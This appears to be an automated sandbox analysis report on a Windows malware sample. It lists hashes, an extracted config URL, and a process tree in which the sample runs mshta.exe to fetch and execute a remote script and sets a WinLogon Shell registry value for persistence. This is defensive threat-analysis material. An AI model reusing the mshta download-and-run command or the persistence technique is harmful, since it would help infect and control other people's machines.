Analysis
-
max time kernel
9s -
max time network
12s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
03-02-2024 21:00
Behavioral task
behavioral1
Sample
8d557a73f900f33cf09ee75f9f69b0ba.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
8d557a73f900f33cf09ee75f9f69b0ba.exe
Resource
win10v2004-20231215-en
Errors
General
-
Target
8d557a73f900f33cf09ee75f9f69b0ba.exe
-
Size
621KB
-
MD5
8d557a73f900f33cf09ee75f9f69b0ba
-
SHA1
986e6e69aa0fa1e68128dee587b9bf3cf4c780c2
-
SHA256
6f3b2c835726e2cf4eda147bdafbe0764bbb7502dfdc53d55f2f3d9e65071d51
-
SHA512
8082c6811185c3634cd91e854bed91b772ca65082185fa6c99b63ed13891d4022c61c864e0dcd257c19f2d847f036b5cf9be2bd4a6ae66cdd632b7082e4b041e
-
SSDEEP
12288:DFrXoPDc6TR74di5m7bZH1E8ADzdNMdQRe+/hRmpg3PCLMUfB9K:5ToPQER7Qom/ZHeDbMdWiLvfBY
Malware Config
Extracted
http://fyreport.com/inst.php?id=skytraf01
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\hotfix.exe" 8d557a73f900f33cf09ee75f9f69b0ba.exe -
resource yara_rule behavioral1/memory/2412-0-0x0000000000400000-0x00000000006C3000-memory.dmp upx behavioral1/memory/2412-14-0x0000000000400000-0x00000000006C3000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeShutdownPrivilege 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2412 wrote to memory of 1796 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 28 PID 2412 wrote to memory of 1796 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 28 PID 2412 wrote to memory of 1796 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 28 PID 2412 wrote to memory of 1796 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 28 PID 2412 wrote to memory of 1200 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 30 PID 2412 wrote to memory of 1200 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 30 PID 2412 wrote to memory of 1200 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 30 PID 2412 wrote to memory of 1200 2412 8d557a73f900f33cf09ee75f9f69b0ba.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\8d557a73f900f33cf09ee75f9f69b0ba.exe"C:\Users\Admin\AppData\Local\Temp\8d557a73f900f33cf09ee75f9f69b0ba.exe"1⤵
- Modifies WinLogon for persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" http://fyreport.com/inst.php?id=skytraf012⤵
- Modifies Internet Explorer settings
PID:1796
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\scgdfgasfbh.bat" "2⤵PID:1200
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:2700
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:2544
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
238B
MD563fafe65c5a7128b5d7cd1f9f81e5d1f
SHA104bef31fa83ea29b0660a18365806c163ac92747
SHA256f89e63c1d83afa4673b2de7bff83e073aee789958fbcc3397c121178198579d1
SHA5121d2115028c46a007a8bdd47a7d6a61cff2250c7946b76a928a362ed9a4ce15d73f34559396b42547d89a0681bdd8a794803258a24ee4b438f7d95b04ce0d9807